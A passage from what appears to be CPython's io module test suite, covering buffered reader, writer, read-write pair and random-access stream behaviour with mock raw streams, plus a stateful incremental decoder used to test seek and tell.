bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
                # After the write, write_pos and write_end are reset to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
            # This relies on the fact that the buffer can contain the whole
            # raw stream; otherwise peek() may return less data.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
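        # TextIOWrapper packs these flags into its tell() cookie, and the
        # all-zero cookie must describe a freshly reset decoder.  i and o
        # start at 1, so XOR-ing each with 1 maps the reset state onto
        # flags == 0; setstate() below applies the same XOR to undo it.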
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
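# A minimal sketch of the word protocol implemented above (illustrative
# only; this helper is not exercised by the test suite): with the initial
# I=1/O=1 settings every input byte becomes "<byte>.", while an 'o' word
# followed by an 'i' word (each with no digits, i.e. 0) switches the
# decoder to variable-length, verbatim output.
def _demo_stateful_decoder():
    d = StatefulIncrementalDecoder()
    assert d.decode(b'abcd') == 'a.b.c.d.'             # fixed length: I=1, O=1
    d = StatefulIncrementalDecoder()
    assert d.decode(b'oiabcd', final=True) == 'abcd.'  # I=0, O=0: verbatim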
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
